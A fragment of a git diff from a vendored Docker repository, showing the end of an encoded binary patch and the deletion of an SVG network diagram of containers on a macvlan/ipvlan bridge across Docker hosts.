z+FVGmqNYSam4L3aC`tq(N!JV}TgV`#NMv$5;iE!Q$C`n`_zlPU`RX`Ne_q9Pg!2C}
z3l3IHW4pf`v!g=b0wH?!O*~A{%hp&W5*#^f65DRrJK7ofmH6CV9WanN6k`^aP4Lu>
zH5DTu<T0C`=BGT#01?5-!2TuAirxy1Qr9B`oF@#GZl^CwSoAw0i}pgNxf9dk;or29
z<R=2zzj=yesN<wO4W)dPNFMy?W)Au@R{t?AALW(aKePqM2E;<nZ%g?$9b_qCpw&6}
zOxaFN7g3v&thye<n7^F|)+u46tVrstG;xw|&$Fl{l>M7ktaxzc)R>$M8qXJV?G1a+
zB0sjDRYae&;f{b-tR)B$3{U+^S`a#x424s2LzRp>Y+x*nj3w*qM=mb>`u}X+kJLyx
z)QW~mNo)*JUdX@{$MIRqy0^FYUwdh6^eq1jx)NmbM&~ayj>5J79RX;+p5!qn4bQ6y
z#r#Ju`&w_MKdygy`?s2L;XOu?mmp50&ezvidk6PGkk_7=KhAoF*CD6tJtsIb_I<F@
zPTLR<^sP>Fm=?WH7%Ma=0B*ym!dx2?0>78N{O28Bpwzl(6Glg@L?$@6e1h{vf2(&>
zfLS^tEIwlVOG7tY<8a%n{Z3KZF>@TXv7NlIMbljec{@?&Bo-$^DNWqOxjhpUS^H@@
z4~%>te!18=rad+@AYT96it|I^Ex+efi{^ZPFS7B~RG6aW)Ji7rr?f&oG=fO{n3qPZ
zJv3x%eRMgpR*zLYI&>SK<=<sVqD%g$&M^`cVBc0t8tS~eCN>mr69(iSvYK8s$FUc&
z6hi1M83a5IC^#T^TAP^6h=5HP4u0wx%(?|A6cNP(kA&fQ=a>_bZ&ju#hYMJ2MZ+Ta
z=kQrr<Av`4-VP|NW<SxoJHfZKKocRttci$Y)VkMfX(-XQl#%TeWx2bci{s)h^gbgD
zNW59FhO0B-MCVEPz~*j~*bfeF|0M(IJ%4$4laAF<mZ2+7R{5U+@h?Q4pTv`2?%Pkz
zytnUPEiI)0s0LuS#jO*7^dGr4nr(^wgBo*I`KIQG(IX0&?|!^?lQv9MINkP&JXxai
z&*;*7t8-U+QzYia_C`soV+xGF=WuzprEU4_2NL%Id++po;#eD=cZuP$^UHgH!P6zM
zlMBS@r`rZTQKpcGp1D^XIn~tFX*k^>ME4>eT(IOvyw(;>pJN)zo|}mYD5da8dZsG9
zhsxe`z)PX3Dk)wERe&D<TJ!dDA!E>f1#Dvq>_(Qe9on_(!M%gOwL&UXyt$D<_+0*s
zR0pSzf!inHI`x6m`U<U%9)sK;NW3O0-b?YkG4bECkEl{hr=S6d%B{SN+gv=%cRQJ^
z^W|;B^^s90f+XYGL2S&42mP!xQF?^m$)eet>m5rWqYpFJ`m-s2()EC7#vw-NwO%%S
zqfilAIDIR9t^nG%P|jIDc5=#|-76N`S`|er9~;XV5WDkWLq#b@8BEg1x9W!Sqs_5K
zX=`iM*e0y_ic(O_&Eee(Dm;qKW)Q?Qixu)48y9AIwbq4^a70RI@f5HpOXRsEZzH~q
zP4Qmj`1q(;u?U!6@IUY$zMOj>=02=i{E(8H&GJKWGG?H5adxAHJ(QUrgcta-;lTtM
zRR~k6@>)#hIl~zkk}LO8-6Qg_uG^zszJi&r%8?N$HjaCN5lo3!SH<pp>yfQ70=+b#
zOxL=>nj&y8X|N(~L?;`##Rn^iN-p<E@b}~~2?8x3a*SFUi$JkHC3vAe^CIYdt2gV5
z%(ZQpXXiGKy<R4JA#;hE(-+naJQq&LhV6^Dd@+jJ-s^{2Y*+089H@G=I(-D%+(D9N
z%d8W|-~5O43Z`r_g9gyOp~m~7*$AS2uQ>tZJQS?c!>8lTGs_+X=dT^5P?n}n+2L#a
zUs*jURphV4i|TREJ~Ms1k++gtIk9ajG5$^+t|HIsv>u^5gLUT|p9R>y*ryP_WYu`q
zsp}F9+Tpr3HKN1g!RJMZ@nudS7n?38t-ZXAV)`Ri>Pt(nY$Y(+1mgc;$+fvjetR+W
zMP_IqI=4Lavlg&LAiN2pvudu*{US2{=Bi6HmI46##PG(ApBA{FhNvPuzzr+Ye(5Bp
z_L0@k`;Yg{el>`=KIhtMLE;{o1~K56jI1O<T9jLV)}^J)RqYRHAyo+cp)OdLH0|0N
zL=`Ou=UlMe8iaH?-M(No6UZh0bX2nMs~v67GA0N!jQRb<S8R@l6rUDa5$lUN&Cr|?
z>ovZXti9<pw2<-X-1Sxjc)t8>jb(_;x^TuT@~5;G*9l$MryM<n(e!lXC^W3xUW`8~
zYH}^eR%EQZ33a*fta7XfM;_R@*^(PhTvR4e0i_M&g=kdYuk0G9a{^?kCh305NkrJn
z=?+KYC&71G!kg$*G~Tx%d{UUQc(S`iZT|LpW_z?p!qIZ$CvYq6^Af9N>11#KG35vk
zS8d*DH9pjk%@Q=rEmkhnIX!58nvVm>iBqK#W-5xaN}dn!AJJiCf~9axN;nYqhG=gP
zc%}Fgm!~%_zRmj|_PVORyi;Ff7R6!haSbw9Q^TIq73@~(Y=O+?2yufyU?8Il$*X^P
z%{^)ywABSH4}GUzm5wTcegzBYo^7LUWglP(O6Mz=DG+FkrqjN6t>xZ*H8HJ;Mbd>l
z_-q&4!O&wW=v&8d0^`{Q{SDM<+^xkd{x~@yDC{3F@6tvTq#VWJ2$%LmG6ylERpe^D
zxisET>(V3OLq)Qq!iv{wX`|bOLs~iEW<FW8t$dmP{Lt7;>Oo8xGIWz#$AwT~IUmWw
z)peI#IXY*+DdppYxvBrhG!re;d5F?{J^%nW60d_0Bh^mdN)&F7JSW31pqcCsH&8!&
zhOZ=6#S6o7;VsAF(zRMX(268A_qxfBd|kM;ZXd1^_X{!Y%^Ms>Ih(>S=7in-eAb@#
z^ELrCZ{4$hnY!yL34+;iqoXxkT4DUy1vzvxg?P<IAQ|dA`G_>hb`KE$j_QKC`c#~;
zKCpMB@o`1e%Vvw^sZTg56izHBnX~4j{|6UAmAOm|U7#y=nIW@Legy1i7_SJatl08a
zk$?1K_l5n*Hy%$Gl81IhM}+Drny|$ilDH)itON+p4vlUR_poRp$>~_kyk@FjDPF@j
zICF)Ej7P?xD~sn>@;4fB6bq(qKpxFmLu)QHDAIrE2xXqYr8C=Y(n6K|jhZdlEK$8D
z<CpnYWWr*%x~W6W_Mx(SJWBEjnjR*4h?4#SvS=}kAkS1dF?TS*GA(DWi7ilL+NLX|
z%fS<$%5=x;1U^{QY7~g;pB*zgx2tLRLHTC@;9H-_*g;igZ&LJAZ0dlhGR7L-h)Uny
zyu=4@-LoVG0@;)UtlWab>Ouxtb+)##;ij4SwWJvpQF5c#X6X^EvXwn1#}Ki0-R-0D
zC;$_4aqjQqjG$>p&mOzWK`xa1m|+sJSf4K|<(<q-r4>f3PWta)P%=9SbQwF;u2rq7
zAbx+Q{KKP}X*IO99wIEIE0cnMwgpk`cCS)A#t&-5n9^mOSK{^5kEPU+pwUorG+n8i
zEDr*KIbiMJ*C4d5hy53%nNhC^W#}H)y#ZVR)M9ai2J8JDlfO1)6Pwa%Na=l>jPR~D
zWN{*vLsbbD4dTsfEGmV3M#B#Le1IOYXL(x2!24ah0wi4l$dMH)e}51&`xQ%(_tfh&
z=hfPOrYt*i3XBZ6$8E7dd2HSIomjl@)@s~qgc~P_p1m6jVG|?bj=5*%X#IL67V*O9
zVZsCxlu+AjnRg8nO%no#Y7K9lPK%Xmaq_I2LwBS-nZ{XNYIb$~7-}Zi$F3v0Xk&Za
z8?p}5XBw;Fe@wwB7%CY=6C~Kzv%|p9#5S{9OQ9irqHWy`h{?pnMC{x_6Dn8lKCU)o
z2^89UU)i2LnMV3tE<ZS9a<uQu7K(ShNifpAT?H)F`d3SGYLrS@+w!m&6RIYUBW?SR
z>_qNa)4O&Gf1c}K`=M)9HK?SCq!?=iR%cUcsuf2ijz`^(uDkDNi?s-lBIv@iG01iz
zm7=VyiKc`~djzZ<)D!kSKu&JVd23;0IaEf88fYH$&<6rML5|+!-z4p>1w&UPVQ;|k
zs@J0zQ=a9#Mg7q;>{{txEtygSrz<trC$+~WrBR8$mzV5+<mRKwi(KfA-}2GD!~EwT
cTK|R~xYw@a%hL$)?SGQAgo1dLs8Qhm0&7~1d;kCd

diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg
deleted file mode 100644
index 757871e3d4..0000000000
--- a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg
+++ /dev/null
@@ -1 +0,0 @@
-<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="561" height="354.5"><style xmlns="http://www.w3.org/1999/xhtml"></style><defs/><g transform="translate(0,0)"><g><rect fill="#FFFFFF" stroke="none" x="0" y="0" width="561" height="354.5"/></g><g transform="translate(0,0) matrix(1,0,0,1,8,177)"><g><g transform="translate(0,0) scale(2.52,1.29)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.3968253968253968,0.7751937984496123)"><path fill="#c5e4fc" stroke="none" d="M 10 0 L 242 0 Q 252 0 252 10 L 252 119 Q 252 129 242 129 L 10 129 Q 0 129 0 119 L 0 10 Q 0 0 10 0 Z" opacity="0.93"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 242 0 Q 252 0 252 10 L 252 119 Q 252 129 242 129 L 10 129 Q 0 129 0 119 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" stroke-width="2" opacity="0.93"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,16,240)"><g transform="translate(4,4) scale(1.0045045045045045,1.0087719298245614)"><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#000000" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.73"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.73"/></g></g></g></g></g><g transform="matrix(1,0,0,1,26,246)"><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="45" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="9" y="0" width="75" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="9" y="0" width="75" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="9" y="13">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="65" y="13"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="76" y="13">1</text></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="15" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="15" width="26" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="15" width="26" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="33" y="28">eth0</text></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="30" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="30" width="88" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="30" width="88" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="2" y="43">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="24" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="43">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="42" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="46" y="43">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="53" y="43">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="57" y="43">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="71" y="43">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="75" y="43">24</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,138,240)"><g transform="translate(4,4) scale(1.0045045045045045,1.0087719298245614)"><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#000000" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.73"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.73"/></g></g></g></g></g><g transform="matrix(1,0,0,1,148,247)"><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="44" fill-opacity="0"/></g></g><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="14" fill-opacity="0"/></g></g><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="11" y="0" width="70" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="11" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="12"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="73" y="12">2</text></g><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="92" height="30" fill-opacity="0"/></g></g><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="87" height="30" fill-opacity="0"/></g></g><g transform="translate(77,42) matrix(1,0,0,1,0,0) translate(-77,-42)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="14" width="87" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="33" y="27">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="3" y="42">172</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="25" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="42">16</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="43" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="46" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="53" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="57" y="42">11</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="71" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="74" y="42">24</text></g></g><g transform="matrix(1,0,0,1,152.86753236814712,193.5)"><g transform="translate(0,0)"><g transform="translate(-40,26.067047119140625) translate(-112.86753236814712,-219.56704711914062) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 193.5 240 L 157.36753236814712 198" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,67,193.49999999999997)"><g transform="translate(0,0)"><g transform="translate(-50,16.067047119140625) translate(-17,-209.5670471191406) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 71.5 240 L 112.63246763185288 197.99999999999997" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,130.5,79.5019243141968)"><g transform="translate(0,0)"><g transform="translate(-60,6.067047119140625) translate(-70.5,-85.56897143333742) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 135 174 L 275.32345076546227 84.0019243141968" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g><g transform="matrix(1,0,0,1,5,185)"><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="76" height="32" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="76" height="16" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="16" y="0" width="46" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="16" y="14">Docker</text></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="76" height="16" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="16" width="50" height="14" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="16" width="50" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="14" y="30">Host</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="43" y="30"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="normal" text-decoration="" line-height="16.5px" x="54" y="30">1</text></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="62" y="18" width="1" height="14" fill-opacity="0"/></g></g><g transform="translate(106,82) matrix(1,0,0,1,0,0) translate(-106,-82)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="1" height="14" fill-opacity="0"/></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,283,177)"><g><g transform="translate(0,0) scale(2.52,1.29)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.3968253968253968,0.7751937984496123)"><path fill="#c5e4fc" stroke="none" d="M 10 0 L 242 0 Q 252 0 252 10 L 252 119 Q 252 129 242 129 L 10 129 Q 0 129 0 119 L 0 10 Q 0 0 10 0 Z" opacity="0.93"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 242 0 Q 252 0 252 10 L 252 119 Q 252 129 242 129 L 10 129 Q 0 129 0 119 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" stroke-width="2" opacity="0.93"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,291,240)"><g transform="translate(4,4) scale(1.0045045045045045,1.0087719298245614)"><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#000000" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.11,0.57)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9009009009009008,1.7543859649122808)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" opacity="0.73"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 101.00000000000001 0 Q 111.00000000000001 0 111.00000000000001 10 L 111.00000000000001 46.99999999999999 Q 111.00000000000001 56.99999999999999 101.00000000000001 56.99999999999999 L 10 56.99999999999999 Q 0 56.99999999999999 0 46.99999999999999 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.73"/></g></g></g></g></g><g transform="matrix(1,0,0,1,301,246)"><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="45" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="9" y="0" width="75" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="9" y="0" width="75" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="9" y="13">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="65" y="13"> #</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="76" y="13">3</text></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="15" width="92" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="15" width="26" height="15" fill-opacity="0"/></g></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect fill="rgb(0,0,0)" stroke="none" x="33" y="15" width="26" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="33" y="28">eth0</text></g><g transform="translate(88,135) matrix(1,0,0,1,0,0) translate(-88,-135)"><g><rect 